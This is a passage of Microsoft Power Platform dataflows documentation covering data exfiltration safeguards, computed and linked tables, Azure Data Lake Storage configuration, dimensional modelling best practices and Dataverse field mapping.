and operated at the network layer or lower. For example, layer 3 firewalls, Network
Security Groups (NSGs), and Azure Private Links are good examples of mechanisms that
can be used. However, location-based conditional access policies in Azure Active
Directory (Azure AD) operate at the application layer and are considered insufficient for
this purpose.
These network isolation policies must obstruct line of sight from dataflows' cloud
execution engine to sensitive data stores (since the cloud engine runs on the public
internet). Dataflows' connectivity to these data stores is then forced to originate from
within one of the permitted networks by binding connections to an on-premises data
gateway or VNet data gateway. An important execution characteristic of dataflows is
that cloud-based evaluation and gateway-based evaluation are never blended. If a
dataflow needs to access a network isolated data store (and is therefore bound to a
gateway), all data access is then required to flow through the gateway. Additionally,
since gateways physically reside in networks controlled by the user tenant, they comply
with network level restrictions such as firewalls and DLP protection solutions. These
restrictions make gateway environments as secure and safe as any corporate managed
devices and mitigate risks associated with arbitrary code execution in a cloud
environment.
It's worth noting that network isolation must be applied to all data stores that might
contain sensitive data. Consider an example where a user creates a dataflow to read
data from OneDrive for Business into Power BI. Then the user later creates a linked
dataflow to transform the data in Power BI into downstream entities. In this scenario, it's
not sufficient to just isolate OneDrive for Business to trusted networks. Since sensitive
data might also reside within Power BI, it's important to isolate such data by enabling
private links and disabling public Internet access for Power BI. Learn more about secure
access to Power BI using private endpoints.
Force gateway execution
The goal for isolating sensitive data store to selected networks is to force the origin of
access back to trusted networks, so that existing policies governing managed devices
can be used to govern data movement from dataflows. In certain cases, a full network
isolation solution might take time to develop, test, and deploy. As an alternative, you
can file a dataflows support ticket to apply a tenant-wide policy that turns off the
Mashup Engine. This policy affects all query evaluations that use the Power Query
Online Mashup Engine. Impacted capabilities include:
Fabric dataflows
Power Platform dataflows
Azure Data Factory wrangling dataflows
Dataflows in Dynamics 365 (Customer Insights, Intelligent Order Management, and
so on)
Power BI Datamart
Power BI Quick Import from SharePoint
After application of the policy, all cloud-based execution fails with the following error:
Cloud evaluation request denied based on tenant policies. Please use a data gateway
and try again. This error effectively forces all query evaluations in the tenant to occur
on gateways, without first rolling out a full network isolation solution. Note that the
policy is applied to the entire tenant and not a subset of workloads. This policy means
existing workloads fail immediately and require manual intervention to convert to run
on gateways. Organizations applying this policy should also ensure that they have
enough capacity in their gateway clusters to accommodate all their workloads.
Tenant isolation
For most software-as-a-service (SaaS) layer data stores, such as Fabric Lakehouse and
Power Platform Dataverse, there's usually a multi-tenant endpoint that one
communicates with to gain access to the data. These endpoints are common across all
users of the service, so they can be difficult to isolate and protect solely using network
(Layer 3) isolation techniques. The recommended approach for this kind of data store is
to use Layer 7 policies, typically provided by Azure Active Directory:
This approach restricts access to the tenant’s sensitive data stores to a set of managed
devices where signing into another tenant isn't permitted, effectively isolating data
movement across the tenant.
Roadmap
The following list contains some of the features that are currently planned to help
organizations better manage data exfiltration risks in Fabric:
Data source connection allowlisting: Allows Fabric tenant admins to control the
kinds of connectors that can be used within the tenant, and the endpoints the
connectors can connect to.
Connection usage auditing: Support for auditing logs that track connection
creation, updating, deletion, and usage.
Creating computed tables in dataflows
Article • 08/04/2023
You can perform in-storage computations when using dataflows with a Power BI
Premium subscription. This lets you do calculations on your existing dataflows, and
return results that enable you to focus on report creation and analytics.
To perform in-storage computations, you first must create the dataflow and bring data
into that Power BI dataflow storage. After you have a dataflow that contains data, you
can create computed tables, which are tables that do in-storage computations.
There are two ways you can connect dataflow data to Power BI:
The following sections describe how to create computed tables on your dataflow data.
In the dataflow authoring tool in the Power BI service, select Edit tables. Then right-click
the table you want to use as the basis for your computed table and on which you want
to perform calculations. On the shortcut menu, select Reference.
For the table to be eligible as a computed table, Enable load must be selected, as shown
in the following image. Right-click the table to display this shortcut menu.
By selecting Enable load, you create a new table whose source is the referenced table.
The icon changes to the computed icon, as shown in the following image.
Any transformation you do on this newly created table will be run on the data that
already resides in Power BI dataflow storage. That means that the query won't run
against the external data source from which the data was imported (for example, the
SQL database from which the data was pulled).
Consider the following example. You have an Account table that contains the raw data
for all the customers from your Dynamics 365 subscription. You also have ServiceCalls
raw data from the service center, with data from the support calls that were performed
from the different accounts on each day of the year.
Imagine you want to enrich the Account table with data from ServiceCalls.
First you would need to aggregate the data from the ServiceCalls to calculate the
number of support calls that were done for each account in the last year.
Next, you merge the Account table with the ServiceCallsAggregated table to calculate
the enriched Account table.
Then you can see the results, shown as EnrichedAccount in the following image.
And that's it—the transformation is done on the data in the dataflow that resides in your
Power BI Premium subscription, not on the source data.
When working with dataflows specifically created in an organization's Azure Data Lake
Storage account, linked tables and computed tables only work properly when the tables
reside in the same storage account. More information: Connect Azure Data Lake Storage
Gen2 for dataflow storage
Linked tables are only available for dataflows created in Power BI and Power Apps. As a
best practice, when doing computations on data joined by on-premises and cloud data,
create a new table to perform such computations. This provides a better experience
than using an existing table for computations, such as an table that is also querying data
from both sources and doing in-storage transformations.
See also
Computed table scenarios and use cases
This article described computed tables and dataflows. Here are some more articles that
might be useful:
The following links provide additional information about dataflows in Power BI and
other resources:
For more information about Power Query and scheduled refresh, you can read these
articles:
For more information about Common Data Model, you can read its overview article:
With dataflows in Microsoft Power Platform, you can have a single organizational data
storage source where business analysts can prep and manage their data once, and then
reuse it between different analytics apps in the organization.
When you link tables between dataflows, you can reuse tables that have already been
ingested, cleansed, and transformed by dataflows that are owned by others, without the
need to maintain that data. The linked tables simply point to the tables in other
dataflows, and don't copy or duplicate the data.
Linked tables are read-only, so if you want to create transformations for a linked table,
you must create a new computed table with a reference to the linked table.
Linked tables only work properly in new Power BI workspaces, and, likewise, all linked
dataflows must be located in new workspaces. More information: Create the new
workspaces in Power BI
7 Note
If your dataflow isn't located in a Premium capacity workspace, you can still
reference a single query—or combine two or more queries—as long as the
transformations aren't defined as in-storage transformations. Such references are
considered standard tables. To do this, turn off the Enable load option for the
referenced queries to prevent the data from being materialized and ingested into
storage. From there, you can reference those Enable load = false queries, and set
Enable load to On only for the resulting queries that you want to materialize.
You can select Get data from the dataflow authoring tool, which displays a dialog box
for selecting the categories and each data source. Then select the Power Platform
Dataflows connector.
A connection window for the selected data connection is displayed. If credentials are
required, you're prompted to provide them.
In Power BI, you can select Add linked tables from the dataflow authoring tool.
You can also select Add linked tables from the Add tables menu in the Power BI service.
A Navigator window opens, and you can choose a set of tables you can connect to. The
window displays tables for which you have permissions across all workspaces and
environments in your organization.
After you select your linked tables, they appear in the list of tables for your dataflow in
the authoring tool, with a special icon identifying them as linked tables.
You can also view the source dataflow from the dataflow settings of your linked table.
Links in the same workspace: When data refresh occurs for a source dataflow, that
event automatically triggers a refresh process for dependent tables in all
destination dataflows in the same workspace, including any calculated tables
based on them. All other tables in the destination dataflow are refreshed according
to the dataflow schedule. Tables that depend on more than one source refresh
their data whenever any of their sources are refreshed successfully.
7 Note
The entire refresh process is committed at once. Because of this, if the data
refresh for the destination dataflow fails, the data refresh for the source
dataflow fails as well.
A table can be referenced by another dataflows. That reference table can also be
reference by other dataflows, and so on, up to five times.
Cyclical dependencies of linked tables aren't allowed.
The dataflow must be in a new Power BI workspace or a Power Apps environment.
A linked table can't be joined with a regular table that gets its data from an on-
premises data source.
When using M parameters to address linked tables, if the source dataflow is
refreshed, it doesn't automatically affect the data in the destination dataflow.
Attempting to connect two dataflow tables between two workspaces of different
storage types—Bring Your Own Storage Account (BYOSA) and Internal—isn't
supported.
Next steps
The following articles might be useful as you create or work with dataflows:
The following articles provide more information about dataflows and Power BI:
For more information about Power Query and scheduled refresh, you can read these
articles:
For more information about Common Data Model, you can read its overview article:
You can configure dataflows to store their data in your organization's Azure Data Lake
Storage Gen2 account. This article describes the general steps necessary to do so, and
provides guidance and best practices along the way.
) Important
Dataflow with Analytical tables feature utilizes the Azure Synapse Link for Dataverse
service, which may offer varying levels of compliance, privacy, security, and data
location commitments. For more information about Azure Synapse Link for
Dataverse, go to What is Azure Synapse Link for Dataverse?.
There are some advantages to configuring dataflows to store their definitions and
datafiles in your data lake, such as:
Azure Data Lake Storage Gen2 provides an enormously scalable storage facility for
data.
Dataflow data and definition files can be leveraged by your IT department's
developers to leverage Azure data and artificial intelligence (AI) services as
demonstrated in the GitHub samples from Azure data services.
It enables developers in your organization to integrate dataflow data into internal
applications and line-of-business solutions, using developer resources for
dataflows and Azure.
Requirements
To use Azure Data Lake Storage Gen2 for dataflows, you need the following:
A Power Apps environment. Any Power Apps plan will allow you to create
dataflows with Azure Data Lake Storage Gen2 as a destination. You'll need to be
authorized in the environment as a maker.
An Azure subscription. You need an Azure subscription to use Azure Data Lake
Storage Gen2.
A resource group. Use a resource group you already have, or create a new one.
An Azure storage account. The storage account must have the Data Lake Storage
Gen2 feature enabled.
Tip
If you don't have an Azure subscription, create a free trial account before you
begin.
1. The storage account must be created in the same Azure Active Directory tenant as
your Power Apps tenant.
2. We recommend that the storage account is created in the same region as the
Power Apps environment you plan to use it in. To determine where your Power
Apps environment is, contact your environment admin.
3. The storage account must have the Hierarchical Name Space feature enabled.
4. You must be granted an Owner role on the storage account.
The following sections walk through the steps necessary to configure your Azure Data
Lake Storage Gen2 account.
1. Make sure you select the same region as your environment and set your storage as
StorageV2 (general purpose v2).
2. Make sure you enable the hierarchical namespace feature.
3. We recommend that you set the replication setting to Read-access geo-redundant
storage (RA-GRS).
To connect your Azure Data Lake Storage Gen2 account with the dataflow, follow these
steps:
1. Sign in to Power Apps , and verify which environment you're in. The environment
switcher is located on the right side of the header.
2. On the left navigation pane, select the down arrow next to Data.
3. In the list that appears, select Dataflows and then on the command bar select New
dataflow.
4. Select the analytical tables you want. These tables indicate what data you want to
store in your organization's Azure Data Lake Store Gen2 account.
Select the storage account to use for dataflow
storage
If a storage account hasn't yet been associated with the environment, a Link to data
lake dialog box appears. You'll need to sign in and find the data lake you created in the
previous steps. In this example, no data lake is associated with the environment and so a
prompt occurs to add one.
5. Select Save.
Once these steps are successfully completed, your Azure Data Lake Storage Gen2
account is connected to Power Platform Dataflows and you can continue to create a
dataflow.
Linking an Azure Data Lake Store Gen2 account for dataflow storage isn't
supported in the default environment.
Once a dataflow storage location is configured for a dataflow, it can't be changed.
Once a storage account is linked, changing the environment's name isn't
supported and dataflows linked to the that storage account will fail. Changing back
the environment's name will re-enable those dataflows.
By default, any member of the environment can access dataflow data using the
Power Platform Dataflows Connector. However, only the owners of a dataflow can
access its files directly in Azure Data Lake Storage Gen2. To authorize more people
to access the dataflows data directly in the lake, you must authorize them to the
dataflow's CDM Folder in the data lake or the data lake itself.
When a dataflow is deleted, its CDM Folder in the lake will also be deleted.
Attempting to connect two dataflow entities between two workspaces of different
storage types—Bring Your Own Storage Account (BYOSA) and Internal—isn't
supported.
) Important
You shouldn't change files created by dataflows in your organization's lake or add
files to a dataflow's CDM Folder. Changing files might damage dataflows or alter
their behavior and is not supported. Power Platform Dataflows only grants read
access to files it creates in the lake. If you authorize other people or services to the
filesystem used by Power Platform Dataflows, only grant them read access to files
or folders in that filesystem.
Privacy notice
By enabling the creation of dataflows with Analytical tables in your organization, via the
Azure Synapse Link for Dataverse service, details about the Azure Data Lake storage
account, such as the name of the storage account, will be sent to and stored in the
Azure Synapse Link for Dataverse service, which is currently located outside the
PowerApps compliance boundary and may employ lesser or different privacy and
security measures than those typically in PowerApps. Note that you may remove the
data lake association at any time to discontinue use of this functionality and your Azure
Data Lake storage account details will be removed from the Azure Synapse Link for
Dataverse service. Further information about Azure Synapse Link for Dataverse is
available in this article.
You can't change the storage location of a dataflow after it was created.
Next steps
This article provided guidance about how to connect an Azure Data Lake Storage Gen2
account for dataflow storage.
For more information about dataflows, the Common Data Model, and Azure Data Lake
Storage Gen2, go to these articles:
For more information about the Common Data Model, go to these articles:
Analytical dataflows store both data and metadata in Azure Data Lake Storage.
Dataflows leverage a standard structure to store and describe data created in the lake,
which is called Common Data Model folders. In this article, you'll learn more about the
storage standard that dataflows use behind the scenes.
However, when the dataflow is analytical, the data is stored in Azure Data Lake Storage.
A dataflow’s data and metadata is stored in a Common Data Model folder. Since a
storage account might have multiple dataflows stored in it, a hierarchy of folders and
subfolders has been introduced to help organize the data. Depending on the product
the dataflow was created in, the folders and subfolders may represent workspaces (or
environments), and then the dataflow’s Common Data Model folder. Inside the
Common Data Model folder, both schema and data of the dataflow tables are stored.
This structure follows the standards defined for Common Data Model.
What is the Common Data Model storage
structure?
Common Data Model is a metadata structure defined to bring conformity and
consistency for using data across multiple platforms. Common Data Model isn't data
storage, it's the way that data is stored and defined.
Common Data Model folders define how a table's schema and its data should be stored.
In Azure Data Lake Storage, data is organized in folders. Folders can represent a
workspace or environment. Under those folders, subfolders for each dataflow are
created.
You can use this JSON file to migrate (or import) your dataflow into another workspace
or environment.
To learn exactly what the model.json metadata file includes, go to The metadata file
(model.json) for Common Data Model.
Data files
In addition to the metadata file, the dataflow folder includes other subfolders. A
dataflow stores the data for each table in a subfolder with the table's name. Data for a
table might be split into multiple data partitions, stored in CSV format.
If your organization enabled dataflows to take advantage of its Data Lake Storage
account and was selected as a load target for dataflows, you can still get data from the
dataflow by using the Power Platform dataflow connector as mentioned above. But you
can also access the dataflow's Common Data Model folder directly through the lake,
even outside of Power Platform tools and services. Access to the lake is possible through
the Azure portal, Microsoft Azure Storage Explorer, or any other service or experience
that supports Azure Data Lake Storage. More information: Connect Azure Data Lake
Storage Gen2 for dataflow storage
Next steps
Use the Common Data Model to optimize Azure Data Lake Storage Gen2
Standard dataflows always load data into Dataverse tables in an environment. Analytical
dataflows always load data into Azure Data Lake Storage accounts. For both dataflow
types, there's no need to provision or manage the storage. Dataflow storage, by default,
is provided and managed by products the dataflow is created in.
Analytical dataflows allow an additional storage option: your organizations' Azure Data
Lake Storage account. This option enables access to the data created by a dataflow
directly through Azure Data Lake Storage interfaces. Providing your own storage
account for analytical dataflows enables other Azure or line-of-business applications to
leverage the data by connecting to the lake directly.
Known limitations
After a dataflow is created, its storage location can't be changed.
Linked and computed entities features are only available when both dataflows are
in the same storage account.
Next steps
The articles below provide further information that can be helpful.
Connect Azure Data Lake Storage Gen2 for dataflow storage (Power BI dataflows)
Connect Azure Data Lake Storage Gen2 for dataflow storage (Power Platform
dataflows)-->
Creating computed entities in dataflows
The enhanced compute engine
Understanding the differences between standard and analytical dataflows
Computed table scenarios and use cases
Article • 08/04/2023
There are benefits to using computed tables in a dataflow. This article describes use
cases for computed tables and describes how they work behind the scenes.
Although it's possible to repeat the queries that created a table and apply new
transformations to them, this approach has drawbacks: data is ingested twice, and the
load on the data source is doubled.
Computed tables solve both problems. Computed tables are similar to other tables in
that they get data from a source and you can apply further transformations to create
them. But their data originates from the storage dataflow used, and not the original data
source. That is, they were previously created by a dataflow and then reused.
For example, if two tables share even a part of their transformation logic, without a
computed table, the transformation has to be done twice.
However, if a computed table is used, then the common (shared) part of the
transformation is processed once and stored in Azure Data Lake Storage. The remaining
transformations are then be processed from the output of the common transformation.
Overall, this processing is much faster.
A computed table provides one place as the source code for the transformation and
speeds up the transformation because it only needs to be done once instead of multiple
times. The load on the data source is also reduced.
Using a reference from this table, you can build a computed table.
The computed table can have further transformations. For example, you can use Group
By to aggregate the data at the customer level.
This means that the Orders Aggregated table is getting data from the Orders table, and
not from the data source again. Because some of the transformations that need to be
done have already been done in the Orders table, performance is better and data
transformation is faster.
You might ask, what's the value of creating a source table that only ingests data? Such a
table can still be useful, because if the data from the source is used in more than one
table, it reduces the load on the data source. In addition, data can now be reused by
other people and dataflows. Computed tables are especially useful in scenarios where
the data volume is large, or when a data source is accessed through an on-premises
data gateway, because they reduce the traffic from the gateway and the load on data
sources behind them.
If the dataflow you're developing is getting bigger and more complex, here are some
things you can do to improve on your original design.
Having a custom function helps by having only a single version of the source code, so
you don't have to duplicate the code. As a result, maintaining the Power Query
transformation logic and the whole dataflow is much easier. For more information, go to
the following blog post: Custom Functions Made Easy in Power BI Desktop .
7 Note
Sometimes you might receive a notification that tells you a premium capacity is
required to refresh a dataflow with a custom function. You can ignore this message
and reopen the dataflow editor. This usually solves your problem unless your
function refers to a "load enabled" query.
If you set up a separate schedule for the linked dataflow, dataflows can be refreshed
unnecessarily and block you from editing the dataflow. There are two recommendations
to avoid this problem:
Don't set a refresh schedule for a linked dataflow in the same workspace as the
source dataflow.
If you want to configure a refresh schedule separately and want to avoid the
locking behavior, move the dataflow to a separate workspace.
Best practices for reusing dataflows
across environments and workspaces
Article • 08/04/2023
This article discusses a collection of best practices for reusing dataflows effectively and
efficiently. Read this article to avoid design pitfalls and potential performance issues as
you develop dataflows for reuse.
If you have data transformation dataflows, you can split them into dataflows that do
common transformations. Each dataflow can do just a few actions. These few actions per
dataflow ensure that the output of that dataflow is reusable by other dataflows.
These levels of endorsement help users find reliable dataflows easier and faster. The
dataflow with a higher endorsement level appears first. The Power BI administrator can
delegate the ability to endorse dataflows to the certified level to other people. More
information: Endorsement - Promoting and certifying Power BI content
Separate tables in multiple dataflows
You can have multiple tables in one dataflow. One of the reasons you might split tables
in multiple dataflows is what you learned earlier in this article about separating the data
ingestion and data transformation dataflows. Another good reason to have tables in
multiple dataflows is when you want a different refresh schedule than other tables.
In the example shown in the following image, the sales table needs to be refreshed
every four hours. The date table needs to be refreshed only once a day to keep the
current date record updated. And a product-mapping table just needs to be refreshed
once a week. If you have all of these tables in one dataflow, you have only one refresh
option for them all. However, if you split these tables into multiple dataflows, you can
schedule the refresh of each dataflow separately.
Good table candidates for dataflow tables
When you develop solutions using Power Query in the desktop tools, you might ask
yourself; which of these tables are good candidates to be moved to a dataflow? The best
tables to be moved to the dataflow are those tables that need to be used in more than
one solution, or more than one environment or service. For example, the Date table
shown in the following image needs to be used in two separate Power BI files. Instead of
duplicating that table in each file, you can build the table in a dataflow as a table, and
reuse it in those Power BI files.
Best practices for creating a dimensional
model using dataflows
Article • 08/04/2023
Designing a dimensional model is one of the most common tasks you can do with a
dataflow. This article highlights some of the best practices for creating a dimensional
model using a dataflow.
Staging dataflows
One of the key points in any data integration system is to reduce the number of reads
from the source operational system. In the traditional data integration architecture, this
reduction is done by creating a new database called a staging database. The purpose of
the staging database is to load data as-is from the data source into the staging
database on a regular schedule.
The rest of the data integration will then use the staging database as the source for
further transformation and converting it to the dimensional model structure.
We recommended that you follow the same approach using dataflows. Create a set of
dataflows that are responsible for just loading data as-is from the source system (and
only for the tables you need). The result is then stored in the storage structure of the
dataflow (either Azure Data Lake Storage or Dataverse). This change ensures that the
read operation from the source system is minimal.
Next, you can create other dataflows that source their data from staging dataflows. The
benefits of this approach include:
Reducing the number of read operations from the source system, and reducing the
load on the source system as a result.
Reducing the load on data gateways if an on-premises data source is used.
Having an intermediate copy of the data for reconciliation purpose, in case the
source system data changes.
Making the transformation dataflows source-independent.
Transformation dataflows
When you've separated your transformation dataflows from the staging dataflows, the
transformation will be independent from the source. This separation helps if you're
migrating the source system to a new system. All you need to do in that case is to
change the staging dataflows. The transformation dataflows are likely to work without
any problem, because they're sourced only from the staging dataflows.
This separation also helps in case the source system connection is slow. The
transformation dataflow won't need to wait for a long time to get records coming
through a slow connection from the source system. The staging dataflow has already
done that part, and the data will be ready for the transformation layer.
Layered Architecture
A layered architecture is an architecture in which you perform actions in separate layers.
The staging and transformation dataflows can be two layers of a multi-layered dataflow
architecture. Trying to do actions in layers ensures the minimum maintenance required.
When you want to change something, you just need to change it in the layer in which
it's located. The other layers should all continue to work fine.
The following image shows a multi-layered architecture for dataflows in which their
tables are then used in Power BI datasets.
Use a computed table as much as possible
When you use the result of a dataflow in another dataflow, you're using the concept of
the computed table, which means getting data from an "already-processed-and-stored"
table. The same thing can happen inside a dataflow. When you reference an table from
another table, you can use the computed table. This is helpful when you have a set of
transformations that need to be done in multiple tables, which are called common
transformations.
In the previous image, the computed table gets the data directly from the source.
However, in the architecture of staging and transformation dataflows, it's likely that the
computed tables are sourced from the staging dataflows.
Build a star schema
The best dimensional model is a star schema model that has dimensions and fact tables
designed in a way to minimize the amount of time to query the data from the model,
and also makes it easy to understand for the data visualizer.
It isn't ideal to bring data in the same layout of the operational system into a BI system.
The data tables should be remodeled. Some of the tables should take the form of a
dimension table, which keeps the descriptive information. Some of the tables should
take the form of a fact table, to keep the aggregatable data. The best layout for fact
tables and dimension tables to form is a star schema. More information: Understand star
schema and the importance for Power BI
Use a unique key value for dimensions
When building dimension tables, make sure you have a key for each one. This key
ensures that there are no many-to-many (or in other words, "weak") relationships
among dimensions. You can create the key by applying some transformation to make
sure a column or a combination of columns is returning unique rows in the dimension.
Then that combination of columns can be marked as a key in the table in the dataflow.
Do an incremental refresh for large fact tables
Fact tables are always the largest tables in the dimensional model. We recommend that
you reduce the number of rows transferred for these tables. If you have a very large fact
table, ensure that you use incremental refresh for that table. An incremental refresh can
be done in the Power BI dataset, and also the dataflow tables.
You can use incremental refresh to refresh only part of the data, the part that has
changed. There are multiple options to choose which part of the data to be refreshed
and which part to be persisted. More information: Using incremental refresh with Power
BI dataflows
One of the best practices for dataflow implementations is separating the responsibilities
of dataflows into two layers: data ingestion and data transformation. This pattern is
specifically helpful when dealing with multiple queries of slower data sources in one
dataflow, or multiple dataflows querying the same data sources. Instead of getting data
from a slow data source again and again for each query, the data ingestion process can
be done once, and the transformation can be done on top of that process. This article
explains the process.
This separation isn't only useful because of the performance improvement, it's also
helpful for the scenarios where an old legacy data source system has been migrated to a
new system. In those cases, only the data ingestion dataflows need to be changed. The
data transformation dataflows remain intact for this type of change.
Reuse in other tools and services
Separation of data ingestion dataflows from data transformation dataflows is helpful in
many scenarios. Another use case scenario for this pattern is when you want to use this
data in other tools and services. For this purpose, it's better to use analytical dataflows
and use your own Data Lake Storage as the storage engine. More information: Analytical
dataflows
Depending on the storage for the output of the Microsoft Power Platform dataflows,
you can use that output in other Azure services.
Azure Machine Learning can consume the output of dataflows and use it for
machine learning scenarios (for example, predictive analysis).
Azure Data Factory can get the output of dataflows on a much larger scale,
combined with the data from big data sources, for advanced data integration
solutions.
Azure Databricks can consume the output of dataflows for applied data science
algorithms and further AI with the big data scale in the Apache Spark back end.
Other Azure data services can use the output of Power Platform dataflows to do
further actions on that data.
In any of these services, use Azure Data Lake Storage as the source. You'll be able to
enter the details of your storage and connect to the data in it. The data is stored in CSV
format, and is readable through any of these tools and services. The following
screenshot shows how Azure Data Lake Storage is a source option for Azure Data
Factory.
In the standard dataflow, you can easily map fields from the dataflow query into
Dataverse tables. However, if the Dataverse table has lookup or relationship fields,
additional consideration is required to make sure this process works.
The tables and their relationship are fundamental concepts of designing a database. To
learn everything about relationships is beyond the scope of this article. However, we'll
discuss it in a general way here.
Let's say you want to store information about customers and their details, including
region, in Dataverse. You can keep everything in one table. Your table can be called
Customers, and it can contain fields, such as CustomerID, Name, Birthdate, and Region.
Now imagine that you have another table that also has the store's information. This
table can have fields, such as Store ID, Name, and Region. As you can see, the region is
repeated in both tables. There's no single place where you can get all regions; some of
the region's data is in the Customers table, and some of it's in the Stores table. If you
ever build an application or a report from this information, you always have to combine
the two regions' information into one.
What's done in the database design practice is to create a table for Region in scenarios
like the one described above. This Region table would have a Region ID, Name, and
other information about the region. The other two tables (Customers and Stores) will
have links to this table using a field (which can be Region ID if we have the ID in both
tables, or Name if it's unique enough to determine a region). This means having a
relationship from the Stores and Customers table to the Region table.
In Dataverse, there are a number of ways to create a relationship. One way is to create a
table, and then create a field in one table that's a relationship (or lookup) to another
table, as described in the next section.
After setting the key field, you can see the field in the mapping of the dataflow.
Known limitations
Mapping to polymorphic lookup fields is currently not supported.
Mapping to a multi-level lookup field, a lookup that points to another tables'
lookup field, is currently not supported.
Lookup fields for Standard Tables, unless they contain alternate key fields as
described in this document, won't show up in the Map Tables dialog.
Dataflows don't guarantee correct loading order when loading data to tables
configured as hierarchical data structures.
The order of query execution, or loading order to Dataverse tables isn't
guaranteed. We recommend that you separate child and parent tables into two
dataflows, and first refresh the dataflow containing child artifacts.
Field mapping considerations for
standard dataflows
Article • 06/20/2023
When loading data into Dataverse tables, you'll need to map the source query's columns
in the dataflow's editing experience to the destination Dataverse table columns. Beyond
mapping of data, there are other considerations and best practices to take into account.
In this article, we cover the different dataflow settings that control the behavior of
dataflow refresh and as a result, the data in the destination table.
Create new records each dataflow refresh, even if such records already exist in the
destination table.
Create new records if they don't already exist in the table, or update existing
records if they already exist in the table. This behavior is called upsert.
Using a key column will indicate to the dataflow to upsert records into the destination
table, while not selecting a key will always create new records in the destination table.
A key column is a column that's unique and deterministic of a data row in the table. For
example, in an Orders table, if the Order ID is a key column, you shouldn't have two
rows with the same Order ID. Also, one Order ID—let's say an order with the ID 345—
should only represent one row in the table. To choose the key column for the table in
Dataverse from the dataflow, you need to set the key field in the Map Tables experience.
Having a primary key in the table ensures that even if you have duplicate data rows with
the same value in the field that's mapped to the primary key, the duplicate entries won't
be loaded into the table, and the table will always have a high quality of the data.
Having a table with a high quality of data is essential in building reporting solutions
based on the table.
The following image shows how you can choose the key column to be used when
upserting records to an existing Dataverse table:
Setting a table’s Unique ID column and using it as a key
field for upserting records into existing Dataverse tables
All Microsoft Dataverse table rows have unique identifiers defined as GUIDs. These
GUIDs are the primary key for each table. By default, a tables primary key can't be set by
dataflows, and is auto-generated by Dataverse when a record is created. There are
advanced use cases where leveraging the primary key of a table is desirable, for
example, integrating data with external sources while keeping the same primary key
values in both the external table and Dataverse table.
7 Note
To take advantage of a table’s unique identifier field, select Load to existing table in the
Map Tables page while authoring a dataflow. In the example shown in the image below,
we would like to load data into the CustomerTransactions table, and use the
TransactionID column from the data source as the unique identifier of the table.
You'll notice that in the Select key dropdown, the unique identifier—